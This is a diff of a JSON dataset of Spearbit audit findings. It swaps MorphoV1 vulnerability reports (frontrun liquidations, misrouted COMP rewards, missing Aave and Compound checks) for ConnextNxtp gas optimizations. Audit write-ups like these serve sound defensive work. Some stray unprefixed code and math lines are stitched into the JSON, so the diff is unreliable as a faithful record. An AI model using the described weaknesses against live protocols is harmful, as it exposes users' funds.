More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Compound\".", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Users can continue to borrow from a deprecated market", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When a market is being marked as deprecated, there is no verification that the borrow for that market has already been disabled. This means a user could borrow from this market and immediately be eligible to be liquidated.", + "title": "EIP712 domain separator can be cached", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The domain separator can be cached for gas optimization.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "ERC20 with transfer's fee are not handled by *PositionManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Some ERC20 tokens could have fees attached to the transfer event, while others could enable them in the future (see USDT, USDC). The current implementation of both PositionManager (for Aave and Compound) is not taking into consideration these types of ERC20 tokens. While Aave seems not to take into consideration this behavior (see LendingPool.sol), Compound, on the other hand, is explicitly handling it inside the doTransferIn function. Morpho is taking for granted that the amount specified by the user will be the amount transferred to the contract's balance, while in reality, the contract will receive less. In supplyLogic, for example, Morpho will account for the user's p2p/pool balance for the full amount but will repay/supply to the pool less than the amount accounted for.", + "title": "stateCommitmentChain can be made immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once assigned in the constructor, stateCommitmentChain cannot be changed.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Cannot liquidate Morpho users if no liquidity on the pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Morpho implements liquidations by repaying the borrowed asset and then withdrawing the collateral If there is no liquidity in the collateral asset pool the asset from the underlying protocol (Aave / Compound). liquidation will fail. Morpho could incur bad debt as they cannot liquidate the user. The liquidation mechanisms of Aave and Compound work differently: They allow the liquidator to seize the debtorsTokens/cTokens which can later be withdrawn for the underlying token once there is enough liquidity in the pool.
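A hedged sketch of the single-step nonce update suggested in the "Nonce can be updated in single step" finding (contract and variable names are illustrative, not Connext's):

    contract NonceSketch {
        uint256 internal nonce;

        // Post-increment returns the old value and bumps storage in a
        // single statement, avoiding a separate second update step.
        function nextNonce() internal returns (uint256) {
            return nonce++;
        }
    }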
Technically, an attacker could even force no liquidity on the pool by frontrunning liquidations by borrowing the entire pool amount - preventing them from being liquidated on Morpho. However, this would require significant capital as collateral in most cases.", + "title": "ZkSyncSpokeConnector._sendMessage encodes unnecessary data", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Augmenting the _data with the processMessage function selector is unnecessary, since on the mirror domain we just need to provide the right parameters to ZkSyncHubConnector.processMessageFromRoot (which by the way anyone can call) to prove the L2 message inclusion of the merkle root _data. Thus, the current implementation wastes gas.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Supplying and borrowing can recreate p2p credit lines even if p2p is disabled", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When supplying/borrowing the algorithm tries to reduce the deltas p2pBorrowDelta/p2pSupplyDelta by moving borrowers/suppliers back to P2P. It is not checked if P2P is enabled. This has some consequences related to when governance disables P2P and wants to put users and liquidity back on the pool through increaseDelta calls. The users could enter P2P again by supplying and borrowing.", + "title": "getD can be optimized by removing an extra multiplication by d per iteration", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The calculation for the new d can be simplified by canceling a d from the numerator and denominator. Basically, we have: f(D) = D^(n+1)/(n^(n+1)·a·prod(x_i)) + (1 - 1/(n·a))·D - sum(x_i), and having/assuming n, a, x_i are fixed, we are using Newton's method to find a solution for f = 0. The original implementation is using: D' = D - f(D)/f'(D) = ((n·a·sum(x_i) + D^(n+1)/(n^(n-1)·prod(x_i)))·D) / ((n·a - 1)·D + (n + 1)·D^(n+1)/(n^n·prod(x_i))), which can be simplified (canceling one D) to: D' = (n·a·sum(x_i) + D^(n+1)/(n^(n-1)·prod(x_i))) / ((n·a - 1) + (n + 1)·D^n/(n^n·prod(x_i))).", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "In Compound implementation, P2P indexes can be stale", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current implementation of MorphoUtils._isLiquidatable loops through all of the tokens in which the user has supplied to/borrowed from. The scope of the function is to check whether the user can be liquidated or not by verifying that debtValue > maxDebtValue. Resolving \"Compound liquidity computation uses outdated cached borrowIndex\" implies that the Compound bor- row index used is always up-to-date but the P2P issues associated with the token could still be out of date if the market has not been used recently, and the underlying Compound indexes (on which the P2P index is based) has changed a lot. As a consequence, all the functions that rely on _isLiquidatable (liquidate, withdraw, borrow) could return a wrong result if the majority of the user's balance is on the P2P balance (the problem is even more aggravated without resolving \"Compound liquidity computation uses outdated cached borrowIndex\".
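The getD simplification above is one Newton step with a single D canceled; a sketch of the algebra in LaTeX, using the notation reconstructed above (n tokens, scaled amplification a, balances x_i):

    f(D) = \frac{D^{n+1}}{n^{n+1} a \prod x_i} + \left(1 - \frac{1}{na}\right)D - \sum x_i,
    \qquad
    D' = D - \frac{f(D)}{f'(D)}
       = \frac{\left(na\sum x_i + \frac{D^{n+1}}{n^{n-1}\prod x_i}\right)D}{(na-1)D + (n+1)\frac{D^{n+1}}{n^n\prod x_i}}
       = \frac{na\sum x_i + \frac{D^{n+1}}{n^{n-1}\prod x_i}}{(na-1) + (n+1)\frac{D^n}{n^n\prod x_i}}.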
Let's say, for example: Alice supplies ETH in pool Alice supplies BAT in P2P Alice borrows some DAI At some point in time the ETH value goes down, but the interest rate of BAT goes up. If the P2P index of BAT had been correctly up-to-date, Alice would have been still solvent, but she gets liquidated by Bob who calls liq- uidate(alice, ETH, DAI) Even by fixing \"Compound liquidity computation uses outdated cached borrowIndex\" Alice would still be liquidated because her entire collateral is on P2P and not in the pool.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Turning off an asset as collateral on Morpho-Aave still allows seizing of that collateral on Morpho and leads to liquidations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho Aave deployment can set the asset to not be used as collateral for Aave's Morpho contract position. On Aave, this prevents liquidators from seizing this asset as collateral. 1. However, this prevention does not extend to users on Morpho as Morpho has not implemented this check. Liquidations are performed through a repay & withdraw combination and withdrawing the asset on Aave is still allowed. 2. When turning off the asset as collateral, the single Morpho contract position on Aave might still be over- collateralized, but some users on Morpho suddenly lose this asset as collateral (LTV becomes 0) and will be liquidated.", + "title": "_recordOutputAsSpent in ArbitrumHubConnector can be optimized by changing the require condition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In _recordOutputAsSpent, _index is compared with a literal value that is a power of 2. The exponentiation in this statement can be completely removed to save gas.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "claimToTreasury(COMP) steals users' COMP rewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The claimToTreasury function can send a market's underlying tokens that have been accumulated in the contract to the treasury. This is intended to be used for the reserve amounts that accumulate in the contract from P2P matches. However, Compound also pays out rewards in COMP and COMP is a valid Compound market. Sending the COMP reserves will also send the COMP rewards. This is especially bad as anyone can claim COMP rewards on the behalf of Morpho at any time and the rewards will be sent to the contract. An attacker could even frontrun a claimToTreasury(cCOMP) call with a Comptroller.claimComp(morpho, [cComp]) call to sabotage the reward system. Users won't be able to claim their rewards.", + "title": "Message.leaf's memory manipulation is redundant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The chunk of memory related to _message is dissected into pieces and then copied into another section of memory and hashed.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Compound liquidity computation uses outdated cached borrowIndex", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The _isLiquidatable iterates over all user-entered markets and calls _getUserLiquidity- DataForAsset(poolToken) -> _getUserBorrowBalanceInOf(poolToken). However, it only updates the indexes of markets that correspond to the borrow and collateral assets. The _getUserBorrowBalanceInOf function computes the underlying pool amount of the user as userBorrowBalance.onPool.mul(lastPoolIndexes[_- poolToken].lastBorrowPoolIndex);. Note that lastPoolIndexes[_poolToken].lastBorrowPoolIndex is a value that was cached by Morpho and it can be outdated if there has not been a user-interaction with that market for a long time. The liquidation does not match Compound's liquidation anymore and users might not be liquidated on Morpho that could be liquidated on Compound. Liquidators would first need to trigger updates to Morpho's internal borrow indexes.", + "title": "coerceBytes32 can be more optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "It would be cheaper to not use TypedMemView in coerceBytes32(). We would only need to check the length and mask.
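For the _recordOutputAsSpent finding above, a hedged sketch of how a bound against a constant power of two can be checked without the EXP opcode (the constant name and value are illustrative, not Connext's):

    uint256 constant OUTBOX_DEPTH = 128; // illustrative depth

    // `_index < 2**OUTBOX_DEPTH` holds exactly when no bit at position
    // OUTBOX_DEPTH or above is set, which a shift checks without EXP.
    function checkIndex(uint256 _index) pure {
        require(_index >> OUTBOX_DEPTH == 0, "index out of range");
    }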
Note: coerceBytes32 doesn't seem to be used. If that is the case, it could also be removed.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "HeapOrdering.getNext returns the root node for nodes not in the list", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "If an id does not exist in the HeapOrdering the getNext() function will return the root node uint256 rank = _heap.ranks[_id]; // @audit returns 0 as rank. rank + 1 will be the root if (rank < _heap.accounts.length) return getAccount(_heap, rank + 1).id; else return address(0);", + "title": "Consider removing domains from propagate() arguments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "propagate(uint32[] calldata _domains, address[] calldata _connectors) only uses _domains to verify its hash against domainsHash, and to emit an event. Hence, its only use seems to be to notify off-chain agents of the supported domains.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Heap only supports balances up to type(uint96).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current heap implementation packs an address and the balance into a single storage slot which If a token has 18 decimals, the largest restricts the balance to the uint96 type with a max value of ~7.9e28. balance that can be stored will be 7.9e10. This could lead to problems with a token of low value, for example, if 1.0 tokens are worth 0.0001$, a user could only store 7_900_000$.", + "title": "Loop counter can be made uint256 to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "There are several loops that use a uint8 as the type for the loop variable. Changing that to uint256 can save some gas.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Delta leads to incorrect reward distributions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Delta describes the amount that is on the pool but still wrongly tracked as inP2P for some users. There are users that do not have their P2P balance updated to an equivalent pool balance and therefore do not earn rewards. There is now a mismatch of this delta between the pool balance that earns a reward and the sum of pool balances that are tracked in the reward manager to earn that reward. The increase in delta directly leads to an increase in rewards for all other users on the pool.", + "title": "Set owner directly to zero address in renounceOwnership", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "1.
In the renounceOwnership function, _proposed will always be the zero address, so instead of setting the variable _proposed as the owner, we can directly set address(0) as the new owner. 2. Similarly, for the renounceOwnership function, also set address(0) as the new owner.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "When adding a new rewards manager, users already on the pool won't be earning rewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When setting a new rewards manager, existing users that are already on the pool are not tracked and won't be earning rewards.", + "title": "Retrieve decimals() once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "There are several locations where the number of decimals() of tokens is retrieved. As all tokens are whitelisted, it would also be possible to retrieve decimals() once and store the values to save gas. BridgeFacet.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "liquidationThreshold computation can be moved for gas efficiency", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "title": "The root... function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "We can use assembly, unroll loops, and use the scratch space to save gas. Also, rootWithCtx can be removed (would save us from jumping) since it has only been used here.", - "body": "The vars.liquidationThreshold computation is only relevant if the user is supplying this asset.
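A hedged sketch of the "Retrieve decimals() once" suggestion above (contract, mapping, and function names are illustrative, not Connext's):

    import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";

    contract DecimalsCacheSketch {
        // Cache each whitelisted token's decimals at enrollment so later
        // swap and slippage calculations avoid an external staticcall.
        mapping(address => uint8) internal cachedDecimals;

        function _enroll(address asset) internal {
            cachedDecimals[asset] = ERC20(asset).decimals();
        }
    }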
Therefore, it can be moved to the if (_isSupplying(vars.userMarkets, vars.borrowMask)) branch.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Gas Optimization" ] }, { - "title": "Add max approvals to markets upon market creation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Approvals to the Compound markets are set on each supplyToPool function call.", + "title": "The insert function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If we use assembly, the scratch space for hashing, and unroll the loop, we can save some gas.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Gas Optimization" ] }, { - "title": "isP2PDisabled flag is not updated by setIsPausedForAllMarkets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current implementation of _setPauseStatus does not update the isP2PDisabled. When _- isPaused = false this is not a real problem because once all the flags are enabled (everything is paused), all the operations will be blocked at the root of the execution of the process. There might be cases instead where isP2PDisabled and the other flags were disabled for a market and Morpho want to enable all of them, resuming all the operations and allowing the users to continue P2P usage. In this case, Morpho would only resume operations without allowing the users to use the P2P flow. function _setPauseStatus(address _poolToken, bool _isPaused) internal { Types.MarketPauseStatus storage pause = marketPauseStatus[_poolToken]; pause.isSupplyPaused = _isPaused; pause.isBorrowPaused = _isPaused; pause.isWithdrawPaused = _isPaused; pause.isRepayPaused = _isPaused; pause.isLiquidateCollateralPaused = _isPaused; pause.isLiquidateBorrowPaused = _isPaused; // ... event emissions }", + "title": "branchRoot function in Merkle.sol can be more optimized by using YUL, unrolling the loop and using the scratch space", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "We can use assembly, unroll the loop in branchRoot, and use the scratch space to save gas.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave liquidate validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic.
By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implements the liquidate function as a mix of repay + supply operations on Aave executed inside _unsafeRepayLogic where needed withdraw + borrow operations on Aave executed inside _unsafeWithdrawLogic where needed From _unsafeRepayLogic (repay + supply on pool where needed) Because _unsafeRepayLogic internally call aave.supply the whole tx could fail in case the supplying has been disabled on Aave (isFrozen == true) for the _poolTokenBorrowed Morpho is not checking that the Aave borrowAsset has isActive == true Morpho do not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert 16 Morpho do not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to borrow that amount to Aave would make the whole tx revert From _unsafeWithdrawLogic (withdraw + borrow on pool where needed) Because _unsafeWithdrawLogic internally calls aave.borrow the whole tx could fail in case the borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) for the _poolTokenCol- lateral Morpho is not checking that the Aave collateralAsset has isActive == true Morpho do not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "TypedMemView.castTo can be optimized by using bitmasks instead of multiple shifts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TypedMemView.castTo uses bit shifts to clear the type flag bits of a memView; instead, masking can be used. Also, an extra OR is used to calculate the final view.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave repay validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implement the repay function as a mix of repay + supply operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Because _unsafeRepayLogic internally call aave.supply the whole tx could fail in case the supplying has been disabled on Aave (isFrozen == true) Morpho is not checking that the Aave market has isActive == true Morpho do not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert Morpho do not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. 
Trying to supply that amount to Aave would make the whole tx revert More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Make domain immutable in Facets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Domain in Connector.sol is an immutable variable, however it is defined as a storage variable in LibConnextStorage.sol. Also once initialized in DiamondInit.sol, it cannot be updated again. To save gas, domain can be made an immutable variable to avoid reading from storage.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave withdraw validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implement the withdraw function as a mix of withdraw + borrow operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Because _unsafeWithdrawLogic internally calls aave.borrow the whole tx could fail in case the borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) Morpho is not checking that the Aave market has isActive == true Morpho do not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert Note 1: Aave is NOT checking that the market isFrozen. This means that users can withdraw even if the market is active but frozen More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Cache router balance in repayAavePortal()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "repayAavePortal() reads s.routerBalances[msg.sender][local] twice: if (s.routerBalances[msg.sender][local] < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds(); ... s.routerBalances[msg.sender][local] -= amountDebited; This can be cached to only read it once.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave borrow validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. 
By reviewing both logic, we have noticed that there are some differences between the logics Note: Morpho re-implement the borrow function as a mix of withdraw + borrow operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Morpho is not checking that the Aave market has isFrozen == false (check done by Aave on the borrow operation), users could be able to borrow in P2P even if the borrow is paused on Aave (isFrozen == true) because Morpho would only call the aave.withdraw (where the frozen flag is not checked) Morpho do not check if market is active (would borrowingEnabled == false if market is not active?) Morpho do not check if market is frozen (would borrowingEnabled == false if market is not frozen?) Morpho do not check that healthFactor > GenericLogic.HEALTH_FACTOR_LIQUIDATION_THRESHOLD Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Unrequired if condition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The below if condition is not required, as tokenPrice will always be 0 at that point. This is because if the contract finds a direct price for the asset it returns early; otherwise, if there is no direct price, tokenPrice is set to 0. This means that in the code ahead tokenPrice will always be 0. function getTokenPrice(address _tokenAddress) public view override returns (uint256, uint256) { ... uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } if (tokenPrice == 0) { ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave supply validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logics Note: Morpho re-implement the supply function as a mix of repay + supply operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Morpho is not checking that the Aave market has isFrozen == false, users could be able to supply in P2P even if the supply is paused on Aave (isFrozen == true) because Morpho would only call the aave.repay (where the frozen flag is not checked) Morpho is not checking if remainingToSupply.rayDiv( poolIndexes[_poolToken].poolSupplyIndex ) === 0. Trying to supply that amount to Aave would make the whole tx revert 19 More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Delete slippage for gas refund", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once s.slippage[_transferId] is read, it's never read again. 
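Deleting it after that final read therefore earns a partial gas refund. A minimal sketch of the pattern (the exact placement in the surrounding function is assumed): uint256 slippage = s.slippage[_transferId]; // last read of the slot delete s.slippage[_transferId]; // zeroing a non-zero slot refunds part of its storage cost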
", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Morpho should avoid creating a new market when the underlying Aave market is frozen", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "In the current implementation of Aave MorphoGovernance.createMarket the function is only check- ing if the AToken is in active state. Morpho should also check if the AToken is not in a frozen state. When a market is frozen, many operations on the Aave side will be prevented (reverting the transaction).", + "title": "Emit event at the beginning in _setOwner()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "_setOwner() maintains an extra variable oldOwner just to emit an event later: function _setOwner(address newOwner) internal { address oldOwner = _owner; _owner = newOwner; _proposedOwnershipTimestamp = 0; _proposed = address(0); emit OwnershipTransferred(oldOwner, newOwner); } If this emit is done at the beginning, oldOwner can be removed.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Compound liquidate validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. Note: Morpho liquidation does not directly call compound.liquidate but acts as a repay + withdraw operation. By reviewing both logic, we have noticed that there are some differences between the logic Morpho does not check Compound seizeGuardianPaused because it is not implementing a \"real\" liquidate on compound, but it's emulating it as a \"repay\" + \"withdraw\". Morpho should anyway monitor off-chain when the value of seizeGuardianPaused changes to true. Which are the scenarios for which Compound decides to block liquidations (across all cTokens)? When this happens, is Compound also pausing all the other operations? [Open question] Should Morpho pause liquidations when the seizeGuardianPaused is true? Morpho is not reverting if msg.sender === borrower Morpho does not check if _amount > 0 Compound revert if amountToSeize > userCollateralBalance, Morpho does not revert and instead uses min(amountToSeize, userCollateralBalance) 20 More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Simplify the assignment logic of _params.normalizedIn in _xcall", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "When amount > 0 we should have asset != address(0) since otherwise the call would revert: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } and when amount == 0 _params.normalizedIn is 0 which is the value passed to _xcall from xcall or xcallIntoLocal. So we can move the calculation for _params.normalizedIn into the if (_amount > 0) { block. if (_amount > 0) { // Transfer funds of input asset to the contract from the user. 
AssetLogic.handleIncomingAsset(_asset, _amount); // Swap to the local asset from adopted if applicable. // TODO: drop the \"IfNeeded\", instead just check whether the asset is already local / needs swap here. _params.bridgedAmt = AssetLogic.swapToLocalAssetIfNeeded(key, _asset, local, _amount, _params.slippage); // Get the normalized amount in (amount sent in by user in 18 decimals). _params.normalizedIn = AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); } gas saved according to test cases: test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__unpermissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -39 (-0.003%)) test_Connext__permissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcallIntoLocal_works() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -39 (-0.003%)) test_Connext__bridgeFastLocalShouldWork() (gas: -39 (-0.004%)) 